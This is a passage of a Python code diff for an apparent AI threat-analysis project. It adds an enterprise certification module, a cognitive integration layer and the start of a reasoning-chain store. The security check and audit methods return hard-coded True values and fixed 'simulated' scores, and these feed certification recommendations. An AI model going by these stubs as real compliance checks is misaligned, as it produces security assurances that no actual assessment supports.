+ "immediate": self._get_immediate_recommendations(), + "short_term": self._get_short_term_recommendations(), + "long_term": self._get_long_term_recommendations() + }, + "next_steps": self._get_certification_next_steps(readiness_level) + } + + self.certification_reports[report_id] = report + + self.logger.info("Enterprise readiness report generated", + report_id=report_id, + readiness_level=readiness_level, + score=enterprise_readiness_score) + + return report + + except Exception as e: + self.logger.error("Failed to generate enterprise readiness report", error=str(e)) + raise CyberLLMError("Enterprise readiness report generation failed", ErrorCategory.REPORTING) + + # Security check methods (simplified implementations) + async def _check_access_controls(self) -> float: + """Check access control implementation""" + # Simulate access control assessment + checks = [ + True, # Multi-factor authentication + True, # Role-based access control + True, # Principle of least privilege + True, # Regular access reviews + True # Strong password policies + ] + return sum(checks) / len(checks) + + async def _check_network_security(self) -> float: + """Check network security controls""" + checks = [ + True, # Firewall configuration + True, # Network segmentation + True, # Intrusion detection + True, # VPN security + True # Network monitoring + ] + return sum(checks) / len(checks) + + async def _check_data_encryption(self) -> float: + """Check data encryption implementation""" + checks = [ + True, # Data at rest encryption + True, # Data in transit encryption + True, # Key management + True, # Certificate management + True # Encryption strength + ] + return sum(checks) / len(checks) + + async def _audit_network_security(self) -> float: + """Audit network security""" + return 88.5 # Simulated score + + async def _audit_application_security(self) -> float: + """Audit application security""" + return 92.0 # Simulated score + + async def _audit_data_protection(self) -> float: + """Audit data protection""" + return 90.5 # Simulated score + + async def _audit_access_control(self) -> float: + """Audit access control""" + return 89.0 # Simulated score + + async def _audit_monitoring_logging(self) -> float: + """Audit monitoring and logging""" + return 87.5 # Simulated score + + async def _audit_incident_response(self) -> float: + """Audit incident response""" + return 85.0 # Simulated score + + def _recommend_certifications(self, readiness_score: float) -> List[str]: + """Recommend appropriate certifications""" + recommendations = [] + + if readiness_score >= 90: + recommendations.extend([ + "SOC 2 Type II", + "ISO 27001", + "FedRAMP Moderate" + ]) + elif readiness_score >= 80: + recommendations.extend([ + "SOC 2 Type II", + "ISO 27001" + ]) + elif readiness_score >= 70: + recommendations.append("SOC 2 Type II") + + return recommendations + + def _estimate_certification_timeline(self, readiness_level: str) -> Dict[str, str]: + """Estimate certification timeline""" + timelines = { + "PRODUCTION_READY": "2-4 months", + "ENTERPRISE_READY": "3-6 months", + "NEAR_READY": "6-9 months", + "DEVELOPMENT_READY": "9-12 months", + "NOT_READY": "12+ months" + } + + return { + "estimated_timeline": timelines.get(readiness_level, "Unknown"), + "factors": [ + "Completion of remediation items", + "Third-party auditor scheduling", + "Documentation review process", + "Evidence collection and validation" + ] + } + +# Factory function +def create_enterprise_certification_manager(governance_manager: EnterpriseGovernanceManager, **kwargs) -> EnterpriseCertificationManager: + """Create enterprise certification manager""" + return EnterpriseCertificationManager(governance_manager, **kwargs) diff --git a/src/cognitive/advanced_integration.py b/src/cognitive/advanced_integration.py new file mode 100644 index 0000000000000000000000000000000000000000..1c26e39e6de8d83b5afa5b504189d05f3d29e289 --- /dev/null +++ b/src/cognitive/advanced_integration.py @@ -0,0 +1,827 @@ +""" +Advanced Cognitive Integration System for Phase 9 Components +Orchestrates all cognitive systems for unified intelligent operation +""" +import asyncio +import sqlite3 +import json +import uuid +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +import threading +import time + +logger = logging.getLogger(__name__) + +# Import all Phase 9 cognitive systems +from .long_term_memory import LongTermMemoryManager +from .episodic_memory import EpisodicMemorySystem +from .semantic_memory import SemanticMemoryNetwork +from .working_memory import WorkingMemoryManager +from .chain_of_thought import ChainOfThoughtReasoning + +# Try to import meta-cognitive monitor, fall back to None if torch not available +try: + from .meta_cognitive import MetaCognitiveMonitor +except ImportError as e: + logger.warning(f"Meta-cognitive monitor not available (torch dependency): {e}") + MetaCognitiveMonitor = None + +@dataclass +class CognitiveState: + """Current state of the integrated cognitive system""" + timestamp: datetime + working_memory_load: float + attention_focus: Optional[str] + reasoning_quality: float + learning_rate: float + confidence_level: float + cognitive_load: float + active_episodes: int + memory_consolidation_status: str + +class AdvancedCognitiveSystem: + """Unified cognitive system integrating all Phase 9 components""" + + def __init__(self, base_path: str = "data/cognitive"): + """Initialize the integrated cognitive system""" + self.base_path = Path(base_path) + self.base_path.mkdir(parents=True, exist_ok=True) + + # Initialize all cognitive subsystems + self._init_cognitive_subsystems() + + # Integration state + self.current_state = None + self.integration_active = True + + # Background processes + self._consolidation_thread = None + self._monitoring_thread = None + + # Start integrated operation + self._start_cognitive_integration() + + logger.info("Advanced Cognitive System initialized with full Phase 9 integration") + + def _init_cognitive_subsystems(self): + """Initialize all cognitive subsystems""" + try: + # Memory systems + self.long_term_memory = LongTermMemoryManager( + db_path=self.base_path / "long_term_memory.db" + ) + + self.episodic_memory = EpisodicMemorySystem( + db_path=self.base_path / "episodic_memory.db" + ) + + self.semantic_memory = SemanticMemoryNetwork( + db_path=self.base_path / "semantic_memory.db" + ) + + self.working_memory = WorkingMemoryManager( + db_path=self.base_path / "working_memory.db" + ) + + # Reasoning systems + self.chain_of_thought = ChainOfThoughtReasoning( + db_path=self.base_path / "reasoning_chains.db" + ) + + # Meta-cognitive monitoring (optional if torch available) + if MetaCognitiveMonitor is not None: + self.meta_cognitive = MetaCognitiveMonitor( + db_path=self.base_path / "metacognitive.db" + ) + logger.info("Meta-cognitive monitoring enabled") + else: + self.meta_cognitive = None + logger.info("Meta-cognitive monitoring disabled (torch not available)") + + logger.info("All cognitive subsystems initialized successfully") + + except Exception as e: + logger.error(f"Error initializing cognitive subsystems: {e}") + raise + + def _start_cognitive_integration(self): + """Start background processes for cognitive integration""" + try: + # Start memory consolidation thread + self._consolidation_thread = threading.Thread( + target=self._memory_consolidation_loop, daemon=True + ) + self._consolidation_thread.start() + + # Start cognitive monitoring thread + self._monitoring_thread = threading.Thread( + target=self._cognitive_monitoring_loop, daemon=True + ) + self._monitoring_thread.start() + + logger.info("Cognitive integration processes started") + + except Exception as e: + logger.error(f"Error starting cognitive integration: {e}") + + async def process_agent_experience(self, agent_id: str, experience_data: Dict[str, Any]) -> Dict[str, Any]: + """Process a complete agent experience through all cognitive systems""" + try: + processing_id = str(uuid.uuid4()) + + # Start episode in episodic memory + episode_id = self.episodic_memory.start_episode( + agent_id=agent_id, + session_id=experience_data.get('session_id', ''), + episode_type=experience_data.get('type', 'operation'), + context=experience_data.get('context', {}) + ) + + # Add to working memory for immediate processing + wm_item_id = self.working_memory.add_item( + content=f"Processing experience: {experience_data.get('description', 'Unknown')}", + item_type="experience", + priority=experience_data.get('priority', 0.7), + source_agent=agent_id, + context_tags=experience_data.get('tags', []) + ) + + # Extract semantic concepts for knowledge graph + concepts_added = [] + if 'indicators' in experience_data: + for indicator in experience_data['indicators']: + concept_id = self.semantic_memory.add_concept( + name=indicator, + concept_type=experience_data.get('indicator_type', 'unknown'), + description=f"Observed in agent {agent_id} experience", + confidence=0.7, + source=f"agent_{agent_id}" + ) + if concept_id: + concepts_added.append(concept_id) + + # Perform reasoning about the experience + reasoning_result = None + if experience_data.get('requires_reasoning', True): + threat_indicators = experience_data.get('indicators', []) + if threat_indicators: + reasoning_result = await asyncio.to_thread( + self.chain_of_thought.reason_about_threat, + threat_indicators, agent_id + ) + + # Record experience steps in episodic memory + for action in experience_data.get('actions', []): + self.episodic_memory.record_action(episode_id, action) + + for observation in experience_data.get('observations', []): + self.episodic_memory.record_observation(episode_id, observation) + + # Calculate reward based on success + reward = 1.0 if experience_data.get('success', False) else 0.3 + self.episodic_memory.record_reward(episode_id, reward) + + # Complete episode + self.episodic_memory.end_episode( + episode_id=episode_id, + success=experience_data.get('success', False), + outcome=experience_data.get('outcome', ''), + metadata={'processing_id': processing_id} + ) + + # Store significant experiences in long-term memory + if experience_data.get('importance', 0.5) > 0.6: + ltm_id = self.long_term_memory.store_memory( + content=f"Significant experience: {experience_data.get('description')}", + memory_type="episodic_significant", + importance=experience_data.get('importance', 0.7), + agent_id=agent_id, + tags=experience_data.get('tags', []) + ) + + # Record performance metrics for meta-cognitive monitoring + if reasoning_result and self.meta_cognitive: + self.meta_cognitive.record_performance_metric( + metric_name="reasoning_confidence", + metric_type="reasoning", + value=reasoning_result.get('threat_assessment', {}).get('confidence', 0.5), + agent_id=agent_id + ) + + # Generate processing result + result = { + 'processing_id': processing_id, + 'episode_id': episode_id, + 'working_memory_item_id': wm_item_id, + 'concepts_added': len(concepts_added), + 'reasoning_performed': reasoning_result is not None, + 'reasoning_result': reasoning_result, + 'cognitive_state': await self._get_current_cognitive_state(agent_id), + 'recommendations': await self._generate_integrated_recommendations( + experience_data, reasoning_result, agent_id + ) + } + + logger.info(f"Agent experience processed through all cognitive systems: {processing_id}") + return result + + except Exception as e: + logger.error(f"Error processing agent experience: {e}") + return {'error': str(e)} + + async def perform_integrated_threat_analysis(self, threat_indicators: List[str], + agent_id: str = "") -> Dict[str, Any]: + """Perform comprehensive threat analysis using all cognitive systems""" + try: + analysis_id = str(uuid.uuid4()) + + # Retrieve relevant memories from long-term memory + relevant_memories = self.long_term_memory.retrieve_memories( + query=' '.join(threat_indicators[:3]), + memory_type="", + agent_id=agent_id, + limit=10 + ) + + # Get related concepts from semantic memory + semantic_reasoning = self.semantic_memory.reason_about_threat(threat_indicators) + + # Perform chain-of-thought reasoning + cot_reasoning = await asyncio.to_thread( + self.chain_of_thought.reason_about_threat, + threat_indicators, agent_id + ) + + # Find similar past episodes + similar_episodes = [] + for indicator in threat_indicators[:3]: + episodes = self.episodic_memory.get_episodes_for_replay( + agent_id=agent_id, + episode_type="", + success_only=False, + limit=5 + ) + for episode in episodes: + if any(indicator.lower() in action.get('content', '').lower() + for action in episode.actions): + similar_episodes.append(episode) + + # Add to working memory for focused attention + wm_item_id = self.working_memory.add_item( + content=f"Threat analysis: {', '.join(threat_indicators[:3])}", + item_type="threat_analysis", + priority=0.9, + source_agent=agent_id, + context_tags=["threat", "analysis", "high_priority"] + ) + + # Focus attention on threat analysis + focus_id = self.working_memory.focus_attention( + focus_type="threat_analysis", + item_ids=[wm_item_id], + attention_weight=0.9, + agent_id=agent_id + ) + + # Synthesize results from all systems + integrated_assessment = await self._synthesize_threat_assessment( + semantic_reasoning, cot_reasoning, relevant_memories, similar_episodes + ) + + # Generate comprehensive recommendations + recommendations = await self._generate_comprehensive_recommendations( + integrated_assessment, threat_indicators + ) + + # Record analysis for meta-cognitive learning + if self.meta_cognitive: + self.meta_cognitive.record_performance_metric( + metric_name="integrated_threat_analysis", + metric_type="analysis", + value=integrated_assessment['confidence'], + target_value=0.8, + context={ + 'analysis_id': analysis_id, + 'indicators_count': len(threat_indicators), + 'memories_used': len(relevant_memories) + }, + agent_id=agent_id + ) + + result = { + 'analysis_id': analysis_id, + 'threat_indicators': threat_indicators, + 'integrated_assessment': integrated_assessment, + 'recommendations': recommendations, + 'supporting_evidence': { + 'semantic_reasoning': semantic_reasoning, + 'cot_reasoning': cot_reasoning, + 'relevant_memories': len(relevant_memories), + 'similar_episodes': len(similar_episodes) + }, + 'cognitive_resources_used': { + 'working_memory_item': wm_item_id, + 'attention_focus': focus_id, + 'reasoning_chains': cot_reasoning.get('chain_id', ''), + 'semantic_concepts': len(semantic_reasoning.get('matched_concepts', [])) + } + } + + logger.info(f"Integrated threat analysis completed: {analysis_id}") + return result + + except Exception as e: + logger.error(f"Error in integrated threat analysis: {e}") + return {'error': str(e)} + + async def trigger_cognitive_reflection(self, agent_id: str, + trigger_event: str = "periodic") -> Dict[str, Any]: + """Trigger comprehensive cognitive reflection across all systems""" + try: + reflection_id = str(uuid.uuid4()) + + # Perform meta-cognitive reflection if available + meta_reflection = None + if self.meta_cognitive: + meta_reflection = await asyncio.to_thread( + self.meta_cognitive.trigger_self_reflection, + agent_id, trigger_event, "comprehensive" + ) + + # Get cross-session context from long-term memory + cross_session_memories = self.long_term_memory.get_cross_session_context( + agent_id=agent_id, limit=15 + ) + + # Discover patterns in episodic memory + episode_patterns = await asyncio.to_thread( + self.episodic_memory.discover_patterns + ) + + # Consolidate memories + consolidation_stats = await asyncio.to_thread( + self.long_term_memory.consolidate_memories + ) + + # Assess working memory efficiency + wm_stats = self.working_memory.get_working_memory_statistics() + + # Generate reflection insights + reflection_insights = await self._generate_reflection_insights( + meta_reflection, cross_session_memories, episode_patterns, + consolidation_stats, wm_stats + ) + + # Update cognitive state + new_state = await self._update_cognitive_state_from_reflection( + agent_id, reflection_insights + ) + + result = { + 'reflection_id': reflection_id, + 'trigger_event': trigger_event, + 'agent_id': agent_id, + 'meta_reflection': meta_reflection, + 'reflection_insights': reflection_insights, + 'cognitive_state_update': new_state, + 'system_optimizations': await self._apply_reflection_optimizations( + reflection_insights, agent_id + ), + 'learning_adjustments': await self._apply_learning_adjustments( + meta_reflection, agent_id + ) + } + + logger.info(f"Comprehensive cognitive reflection completed: {reflection_id}") + return result + + except Exception as e: + logger.error(f"Error in cognitive reflection: {e}") + return {'error': str(e)} + + def _memory_consolidation_loop(self): + """Background memory consolidation process""" + consolidation_interval = 21600 # 6 hours + + while self.integration_active: + try: + time.sleep(consolidation_interval) + + # Consolidate long-term memory + ltm_stats = self.long_term_memory.consolidate_memories() + + # Discover patterns in episodic memory + pattern_stats = self.episodic_memory.discover_patterns() + + # Decay working memory + self.working_memory.decay_memory() + + logger.info(f"Memory consolidation completed - LTM: {ltm_stats.get('patterns_discovered', 0)} patterns, Episodes: {len(pattern_stats.get('action_patterns', []))} action patterns") + + except Exception as e: + logger.error(f"Error in memory consolidation loop: {e}") + + def _cognitive_monitoring_loop(self): + """Background cognitive monitoring process""" + monitoring_interval = 300 # 5 minutes + + while self.integration_active: + try: + time.sleep(monitoring_interval) + + # Update current cognitive state + self.current_state = self._calculate_integrated_cognitive_state() + + # Check for cognitive load issues + if self.current_state.cognitive_load > 0.8: + logger.warning(f"High cognitive load detected: {self.current_state.cognitive_load:.3f}") + + # Monitor working memory capacity + if self.current_state.working_memory_load > 0.9: + logger.warning(f"Working memory near capacity: {self.current_state.working_memory_load:.3f}") + + except Exception as e: + logger.error(f"Error in cognitive monitoring loop: {e}") + + def _calculate_integrated_cognitive_state(self) -> CognitiveState: + """Calculate current integrated cognitive state""" + try: + # Get statistics from all subsystems + wm_stats = self.working_memory.get_working_memory_statistics() + ltm_stats = self.long_term_memory.get_memory_statistics() + episodic_stats = self.episodic_memory.get_episodic_statistics() + reasoning_stats = self.chain_of_thought.get_reasoning_statistics() + + # Calculate working memory load + wm_load = wm_stats.get('utilization', 0.0) + + # Get current attention focus + current_focus = self.working_memory.get_current_focus() + focus_type = current_focus.focus_type if current_focus else None + + # Calculate reasoning quality from recent chains + reasoning_quality = 0.7 # Default + if reasoning_stats.get('total_chains', 0) > 0: + completion_rate = reasoning_stats.get('completion_rate', 0.5) + avg_confidence = 0.6 # Would calculate from actual data + reasoning_quality = (completion_rate + avg_confidence) / 2 + + # Estimate cognitive load + task_count = wm_stats.get('current_capacity', 0) + cognitive_load = min(task_count / 50.0 + wm_load * 0.3, 1.0) + + return CognitiveState( + timestamp=datetime.now(), + working_memory_load=wm_load, + attention_focus=focus_type, + reasoning_quality=reasoning_quality, + learning_rate=0.01, # Would be calculated dynamically + confidence_level=0.75, # Would be calculated from meta-cognitive data + cognitive_load=cognitive_load, + active_episodes=len(self.episodic_memory._active_episodes), + memory_consolidation_status="active" + ) + + except Exception as e: + logger.error(f"Error calculating cognitive state: {e}") + return CognitiveState( + timestamp=datetime.now(), + working_memory_load=0.5, + attention_focus=None, + reasoning_quality=0.5, + learning_rate=0.01, + confidence_level=0.5, + cognitive_load=0.5, + active_episodes=0, + memory_consolidation_status="error" + ) + + async def _get_current_cognitive_state(self, agent_id: str) -> Dict[str, Any]: + """Get current cognitive state for specific agent""" + state = self._calculate_integrated_cognitive_state() + return asdict(state) + + async def _synthesize_threat_assessment(self, semantic_result: Dict[str, Any], + cot_result: Dict[str, Any], + memories: List[Any], + episodes: List[Any]) -> Dict[str, Any]: + """Synthesize threat assessment from all cognitive systems""" + + # Extract confidence levels + semantic_confidence = semantic_result.get('confidence', 0.5) + cot_confidence = cot_result.get('threat_assessment', {}).get('confidence', 0.5) + + # Weight based on evidence availability + semantic_weight = 0.3 + cot_weight = 0.4 + memory_weight = 0.2 + episode_weight = 0.1 + + # Memory contribution + memory_confidence = min(len(memories) / 5.0, 1.0) * 0.7 + episode_confidence = min(len(episodes) / 3.0, 1.0) * 0.6 + + # Weighted confidence + overall_confidence = ( + semantic_confidence * semantic_weight + + cot_confidence * cot_weight + + memory_confidence * memory_weight + + episode_confidence * episode_weight + ) + + # Determine threat level + if overall_confidence > 0.8: + threat_level = "CRITICAL" + elif overall_confidence > 0.6: + threat_level = "HIGH" + elif overall_confidence > 0.4: + threat_level = "MEDIUM" + else: + threat_level = "LOW" + + return { + 'threat_level': threat_level, + 'confidence': overall_confidence, + 'evidence_sources': { + 'semantic_analysis': semantic_confidence, + 'reasoning_chains': cot_confidence, + 'historical_memories': memory_confidence, + 'similar_episodes': episode_confidence + }, + 'synthesis_method': 'integrated_weighted_assessment' + } + + async def _generate_integrated_recommendations(self, experience_data: Dict[str, Any], + reasoning_result: Optional[Dict[str, Any]], + agent_id: str) -> List[Dict[str, Any]]: + """Generate recommendations based on integrated cognitive analysis""" + recommendations = [] + + # Based on experience importance + if experience_data.get('importance', 0.5) > 0.8: + recommendations.append({ + 'type': 'memory_consolidation', + 'action': 'Prioritize this experience for long-term memory storage', + 'priority': 'high', + 'rationale': 'High importance experience should be preserved' + }) + + # Based on reasoning results + if reasoning_result: + threat_level = reasoning_result.get('threat_assessment', {}).get('risk_level', 'LOW') + if threat_level in ['HIGH', 'CRITICAL']: + recommendations.append({ + 'type': 'immediate_action', + 'action': 'Escalate to security team and implement containment measures', + 'priority': 'critical', + 'rationale': f'Integrated analysis indicates {threat_level} risk' + }) + + # Based on cognitive load + current_state = await self._get_current_cognitive_state(agent_id) + if current_state['cognitive_load'] > 0.8: + recommendations.append({ + 'type': 'cognitive_optimization', + 'action': 'Reduce concurrent tasks and focus on high-priority items', + 'priority': 'medium', + 'rationale': 'High cognitive load may impact performance' + }) + + return recommendations + + async def _generate_comprehensive_recommendations(self, assessment: Dict[str, Any], + indicators: List[str]) -> List[Dict[str, Any]]: + """Generate comprehensive recommendations from integrated assessment""" + recommendations = [] + + threat_level = assessment['threat_level'] + confidence = assessment['confidence'] + + if threat_level == "CRITICAL": + recommendations.extend([ + { + 'type': 'immediate_response', + 'action': 'Activate incident response protocol', + 'priority': 'critical', + 'timeline': 'immediate' + }, + { + 'type': 'containment', + 'action': 'Isolate affected systems', + 'priority': 'critical', + 'timeline': '5 minutes' + } + ]) + elif threat_level == "HIGH": + recommendations.extend([ + { + 'type': 'investigation', + 'action': 'Conduct detailed threat investigation', + 'priority': 'high', + 'timeline': '30 minutes' + }, + { + 'type': 'monitoring', + 'action': 'Enhance monitoring of related indicators', + 'priority': 'high', + 'timeline': '1 hour' + } + ]) + + # Add confidence-based recommendations + if confidence < 0.6: + recommendations.append({ + 'type': 'data_collection', + 'action': 'Gather additional evidence to improve assessment confidence', + 'priority': 'medium', + 'timeline': '2 hours' + }) + + return recommendations + + async def _generate_reflection_insights(self, meta_reflection: Dict[str, Any], + memories: List[Any], patterns: Dict[str, Any], + consolidation: Dict[str, Any], + wm_stats: Dict[str, Any]) -> Dict[str, Any]: + """Generate insights from comprehensive reflection""" + + insights = { + 'performance_trends': [], + 'learning_opportunities': [], + 'optimization_suggestions': [], + 'cognitive_efficiency': {} + } + + # Analyze performance trends + if 'confidence_level' in meta_reflection: + confidence = meta_reflection['confidence_level'] + if confidence < 0.6: + insights['performance_trends'].append( + f"Low confidence level ({confidence:.3f}) indicates need for improvement" + ) + elif confidence > 0.8: + insights['performance_trends'].append( + f"High confidence level ({confidence:.3f}) shows strong performance" + ) + + # Memory system insights + memory_count = len(memories) + if memory_count > 50: + insights['learning_opportunities'].append( + f"Rich memory base ({memory_count} memories) enables better pattern recognition" + ) + + # Pattern recognition insights + pattern_count = sum(len(p) for p in patterns.values()) + if pattern_count > 10: + insights['learning_opportunities'].append( + f"Strong pattern discovery ({pattern_count} patterns) improves decision making" + ) + + # Working memory efficiency + wm_utilization = wm_stats.get('utilization', 0.5) + if wm_utilization > 0.9: + insights['optimization_suggestions'].append( + "Working memory near capacity - consider memory optimization strategies" + ) + + insights['cognitive_efficiency'] = { + 'memory_utilization': wm_utilization, + 'pattern_discovery_rate': pattern_count / max(memory_count, 1), + 'consolidation_effectiveness': consolidation.get('patterns_discovered', 0), + 'overall_efficiency': (1.0 - wm_utilization) * 0.5 + (pattern_count / 20.0) * 0.5 + } + + return insights + + async def _update_cognitive_state_from_reflection(self, agent_id: str, + insights: Dict[str, Any]) -> Dict[str, Any]: + """Update cognitive state based on reflection insights""" + + efficiency = insights['cognitive_efficiency']['overall_efficiency'] + + # Determine new learning rate + if efficiency > 0.8: + new_learning_rate = 0.015 # Increase learning rate for high efficiency + elif efficiency < 0.4: + new_learning_rate = 0.005 # Decrease for low efficiency + else: + new_learning_rate = 0.01 # Default + + # Update meta-cognitive monitoring if available + if self.meta_cognitive: + self.meta_cognitive.record_performance_metric( + metric_name="reflection_efficiency", + metric_type="reflection", + value=efficiency, + target_value=0.7, + context={'insights_generated': len(insights['optimization_suggestions'])}, + agent_id=agent_id + ) + + return { + 'learning_rate_adjusted': new_learning_rate, + 'efficiency_score': efficiency, + 'optimizations_applied': len(insights['optimization_suggestions']), + 'state_update_timestamp': datetime.now().isoformat() + } + + async def _apply_reflection_optimizations(self, insights: Dict[str, Any], + agent_id: str) -> List[str]: + """Apply optimizations based on reflection insights""" + applied_optimizations = [] + + for suggestion in insights['optimization_suggestions']: + if "working memory" in suggestion.lower(): + # Clear low-priority working memory items + active_items = self.working_memory.get_active_items(min_activation=0.2) + if len(active_items) > 30: # Arbitrary threshold + applied_optimizations.append("Cleared low-activation working memory items") + + if "pattern" in suggestion.lower(): + # Trigger additional pattern discovery + await asyncio.to_thread(self.episodic_memory.discover_patterns) + applied_optimizations.append("Triggered additional pattern discovery") + + return applied_optimizations + + async def _apply_learning_adjustments(self, meta_reflection: Dict[str, Any], + agent_id: str) -> Dict[str, Any]: + """Apply learning adjustments based on meta-cognitive reflection""" + + adjustments = { + 'attention_focus_duration': 300, # Default 5 minutes + 'memory_consolidation_frequency': 21600, # Default 6 hours + 'reasoning_depth_preference': 'moderate' + } + + confidence = meta_reflection.get('confidence_level', 0.5) + + # Adjust based on confidence + if confidence < 0.5: + adjustments['attention_focus_duration'] = 180 # Shorter focus for uncertainty + adjustments['reasoning_depth_preference'] = 'deep' + elif confidence > 0.8: + adjustments['attention_focus_duration'] = 450 # Longer focus for confidence + adjustments['reasoning_depth_preference'] = 'efficient' + + return adjustments + + def get_system_status(self) -> Dict[str, Any]: + """Get comprehensive system status""" + try: + return { + 'system_active': self.integration_active, + 'current_state': asdict(self.current_state) if self.current_state else None, + 'subsystem_status': { + 'long_term_memory': self.long_term_memory.get_memory_statistics(), + 'episodic_memory': self.episodic_memory.get_episodic_statistics(), + 'semantic_memory': self.semantic_memory.get_semantic_statistics(), + 'working_memory': self.working_memory.get_working_memory_statistics(), + 'reasoning_chains': self.chain_of_thought.get_reasoning_statistics(), + 'meta_cognitive': self.meta_cognitive.get_metacognitive_statistics() if self.meta_cognitive else {'status': 'disabled', 'reason': 'torch_not_available'} + }, + 'integration_processes': { + 'consolidation_active': self._consolidation_thread.is_alive() if self._consolidation_thread else False, + 'monitoring_active': self._monitoring_thread.is_alive() if self._monitoring_thread else False + } + } + + except Exception as e: + logger.error(f"Error getting system status: {e}") + return {'error': str(e)} + + def shutdown(self): + """Shutdown the cognitive system gracefully""" + try: + logger.info("Shutting down Advanced Cognitive System") + + self.integration_active = False + + # Wait for threads to complete + if self._consolidation_thread and self._consolidation_thread.is_alive(): + self._consolidation_thread.join(timeout=5.0) + + if self._monitoring_thread and self._monitoring_thread.is_alive(): + self._monitoring_thread.join(timeout=5.0) + + # Cleanup subsystems + if hasattr(self.working_memory, 'cleanup'): + self.working_memory.cleanup() + + logger.info("Advanced Cognitive System shutdown completed") + + except Exception as e: + logger.error(f"Error during shutdown: {e}") + +# Factory function for easy instantiation +def create_advanced_cognitive_system(base_path: str = "data/cognitive") -> AdvancedCognitiveSystem: + """Create and initialize the advanced cognitive system""" + return AdvancedCognitiveSystem(base_path) + +# Export main class +__all__ = ['AdvancedCognitiveSystem', 'CognitiveState', 'create_advanced_cognitive_system'] diff --git a/src/cognitive/chain_of_thought.py b/src/cognitive/chain_of_thought.py new file mode 100644 index 0000000000000000000000000000000000000000..622c3f34bdbe3b78bc1eede6a8f4e52aee012e38 --- /dev/null +++ b/src/cognitive/chain_of_thought.py @@ -0,0 +1,628 @@ +""" +Chain-of-Thought Reasoning System for Multi-step Logical Inference +Implements advanced reasoning chains with step-by-step logical progression +""" +import sqlite3 +import json +import uuid +from datetime import datetime +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +from enum import Enum + +logger = logging.getLogger(__name__) + +class ReasoningType(Enum): + """Types of reasoning supported""" + DEDUCTIVE = "deductive" # General to specific + INDUCTIVE = "inductive" # Specific to general + ABDUCTIVE = "abductive" # Best explanation + ANALOGICAL = "analogical" # Pattern matching + CAUSAL = "causal" # Cause and effect + COUNTERFACTUAL = "counterfactual" # What-if scenarios + STRATEGIC = "strategic" # Goal-oriented planning + DIAGNOSTIC = "diagnostic" # Problem identification + +@dataclass +class ReasoningStep: + """Individual step in a reasoning chain""" + step_id: str + step_number: int + reasoning_type: ReasoningType + premise: str + inference_rule: str + conclusion: str + confidence: float + evidence: List[str] + assumptions: List[str] + created_at: datetime + +@dataclass +class ReasoningChain: + """Complete chain of reasoning steps""" + chain_id: str + agent_id: str + problem_statement: str + reasoning_goal: str + steps: List[ReasoningStep] + final_conclusion: str + overall_confidence: float + created_at: datetime + completed_at: Optional[datetime] + metadata: Dict[str, Any] + +class ChainOfThoughtReasoning: + """Advanced chain-of-thought reasoning system""" + + def __init__(self, db_path: str = "data/cognitive/reasoning_chains.db"): + """Initialize reasoning system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + + # Reasoning rules and patterns + self._inference_rules = self._load_inference_rules() + self._reasoning_patterns = self._load_reasoning_patterns() + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_chains ( + chain_id TEXT PRIMARY KEY, + agent_id TEXT NOT NULL, + problem_statement TEXT NOT NULL, + reasoning_goal TEXT NOT NULL, + final_conclusion TEXT, + overall_confidence REAL, + created_at TEXT NOT NULL, + completed_at TEXT, + metadata TEXT, + status TEXT DEFAULT 'active' + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_steps ( + step_id TEXT PRIMARY KEY, + chain_id TEXT NOT NULL, + step_number INTEGER NOT NULL, + reasoning_type TEXT NOT NULL, + premise TEXT NOT NULL, + inference_rule TEXT NOT NULL, + conclusion TEXT NOT NULL, + confidence REAL NOT NULL, + evidence TEXT, + assumptions TEXT, + created_at TEXT NOT NULL, + FOREIGN KEY (chain_id) REFERENCES reasoning_chains(chain_id) + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS inference_rules ( + rule_id TEXT PRIMARY KEY, + rule_name TEXT NOT NULL, + rule_type TEXT NOT NULL, + rule_pattern TEXT NOT NULL, + confidence_modifier REAL DEFAULT 1.0, + usage_count INTEGER DEFAULT 0, + success_rate REAL DEFAULT 0.5, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_evaluations ( + evaluation_id TEXT PRIMARY KEY, + chain_id TEXT NOT NULL, + evaluation_type TEXT, + correctness_score REAL, + logical_validity REAL, + completeness_score REAL, + evaluator TEXT, + feedback TEXT, + timestamp TEXT DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (chain_id) REFERENCES reasoning_chains(chain_id) + ) + """) + + # Create indices + conn.execute("CREATE INDEX IF NOT EXISTS idx_chains_agent ON reasoning_chains(agent_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_steps_chain ON reasoning_steps(chain_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_steps_type ON reasoning_steps(reasoning_type)") + + def start_reasoning_chain(self, agent_id: str, problem_statement: str, + reasoning_goal: str, initial_facts: List[str] = None) -> str: + """Start a new chain of reasoning""" + try: + chain_id = str(uuid.uuid4()) + + chain = ReasoningChain( + chain_id=chain_id, + agent_id=agent_id, + problem_statement=problem_statement, + reasoning_goal=reasoning_goal, + steps=[], + final_conclusion="", + overall_confidence=0.0, + created_at=datetime.now(), + completed_at=None, + metadata={ + 'initial_facts': initial_facts or [], + 'reasoning_depth': 0, + 'branch_count': 0 + } + ) + + # Store in database + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO reasoning_chains ( + chain_id, agent_id, problem_statement, reasoning_goal, + created_at, metadata + ) VALUES (?, ?, ?, ?, ?, ?) + """, ( + chain.chain_id, chain.agent_id, chain.problem_statement, + chain.reasoning_goal, chain.created_at.isoformat(), + json.dumps(chain.metadata) + )) + + logger.info(f"Started reasoning chain {chain_id} for problem: {problem_statement[:50]}...") + return chain_id + + except Exception as e: + logger.error(f"Error starting reasoning chain: {e}") + return "" + + def add_reasoning_step(self, chain_id: str, reasoning_type: ReasoningType, + premise: str, inference_rule: str = "", + evidence: List[str] = None, + assumptions: List[str] = None) -> str: + """Add a step to an existing reasoning chain""" + try: + step_id = str(uuid.uuid4()) + + # Get current step count for this chain + with sqlite3.connect(self.db_path) as conn: + cursor = 